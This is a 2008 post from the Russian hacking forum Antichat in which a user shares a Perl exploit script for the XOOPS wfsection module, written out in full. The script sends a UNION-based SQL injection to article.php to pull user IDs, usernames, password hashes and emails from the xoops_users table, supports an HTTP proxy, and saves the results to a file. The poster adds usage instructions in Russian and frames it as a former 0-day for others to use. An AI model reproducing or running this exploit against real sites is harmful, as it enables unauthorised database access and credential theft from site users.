Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
12.05.2008, 23:54
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337
Репутация:
3486
|
|
[xoops - Exploit]
Бывший 0дэй в пределах моего харда (мб). Сейчас уже актуальность утеряна, стало быть выкладываю сюда. Писал не особо кропотливо, любители доебаться к коду -> go2cock. Есть поддержка хттп проксей, онли хттп ибо не хотелось ебли со скачкой доп либ для соксов (у меня их небыло=\). А уж LWP полный есть уже у всех имхо.
Код:
#!/usr/bin/perl
use LWP::UserAgent;
&header;
if((@ARGV<1) or (@ARGV>2)){&usage;}
my $url=$ARGV[0];
if(!$ARGV[1]){print "\n\n[!] Exploit works without proxy!";}
else {$proxy=$ARGV[1]; print "\n\n[+] Exploit works with proxy: ",$ARGV[1];}
print "\n[~] Trying get uid, uname, pass, email\n";
$ua=LWP::UserAgent->new or die;
$ua->agent("Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)");
if($proxy){$ua->proxy('http',"http://".$proxy."/");}
my $omfg = $ua->get("http://$url/wfsection/article.php?articleid=-28+union+select+1,2,3,concat(0x232323,uid,0x3a,uname,0x3a,pass,0x3a,email,0x232323),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+xoops_users+limit+0,1--")->content;
$omfg =~m%###(.*?)###%i;
my $bla = $1;
if (!$bla) {print "[!] Exploit Failed!\n";}
else {print "[+] Complete!\n\n [uid:uname:pass:email]\n";
print $bla;
open (F,">","omfg.txt") or die "$!";
print F $bla,"\n\nHave Fun, hacker:d\n\n[h0mepage: slip.netsec.ru, email: dotSlip@slip.netsec.ru]";
close F;}
sub header
{print q(
_ _ _____ _ _
| | | | / ____| (_)
___ ___ __| | ___ | |__ _ _ | (___ | |_ _ __
/ __/ _ \ / _` |/ _ \ | '_ \| | | | \___ \| | | '_ \
| (_| (_) | (_| | __/ | |_) | |_| | _ ____) | | | |_) |
\___\___/ \__,_|\___| |_.__/ \__, | (_)_____/|_|_| .__/
__/ | | |
|___/ |_|
[h0mepage: slip.netsec.ru, email: dotSlip@slip.netsec.ru])}
sub usage{
print q(
usage: perl expl.pl <url> <proxy>
example: perl expl.pl www.site.hosting1.com/modules 127.0.0.1:81
or: perl expl.pl www.site.hosting1.com/modules - without proxy);
exit(0);
}
Впринципе в usage всё понятно описано, но добавлю, ОБЯЗАТЕЛЬНО написать путь до папки с модулями, именно в таком виде как написанное в usage. Если напишите не так, нихера не будет работать. Так же результаты хэка сохраняет в файл omfg.txt в той директории, откуда был запущен скрипт. В аттаче сам сплойт. |
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
